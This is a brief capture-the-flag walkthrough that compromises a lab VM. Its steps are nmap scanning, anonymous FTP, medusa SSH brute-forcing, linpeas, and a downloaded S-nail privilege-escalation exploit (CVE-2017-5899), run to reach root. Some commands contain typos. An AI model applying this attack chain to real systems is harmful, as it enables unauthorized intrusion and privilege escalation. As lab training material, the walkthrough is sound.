Overview:
Target Machine IP Address: 192.168.56.110 My Machine IP Address: 192.168.56.1
Mission:
Boot to Root 1. To get user flag 2. To get root flag 3. To get root accessLevel: Easy
linpeas.sh did wonder as always
Download:
You can download the machine from here.************************************ Information Gathering & Scanning Process:
sudo arp-scan --interface=vboxnet0 192.168.56.1/24Target IP: 192.168.56.110
nmap -sC -sV -p- -Pn 192.168.56.110 -o nmap.log
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-r-xr-xr-x 1 1000 1000 297 Feb 07 17:33 chadinfo 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) | http-robots.txt: 1 disallowed entry |_/kingchad.html
- FTP

file chadinfo (it is an archived or zipped file) unzip chadinfo strings chadinfo


medusa -h 192.168.56.110 -u chad -P password.txt -M ssh

ssh chat@192.168.56.110 password: maidenstowerPost Exploitation: Let’s use my favourite tool linpeas.sh

searchsploit S-nail

cp /usr/share/exploitdb/exploits/multiple/local/47172.sh .However, this one worked for me. https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh (I downloaded this on my Kali Machine and then uploaded to /tmp of victim machine)
chmod +x exploit.sh ./exploit (I had to run it couple of times to get the root) cat /root/root.txt
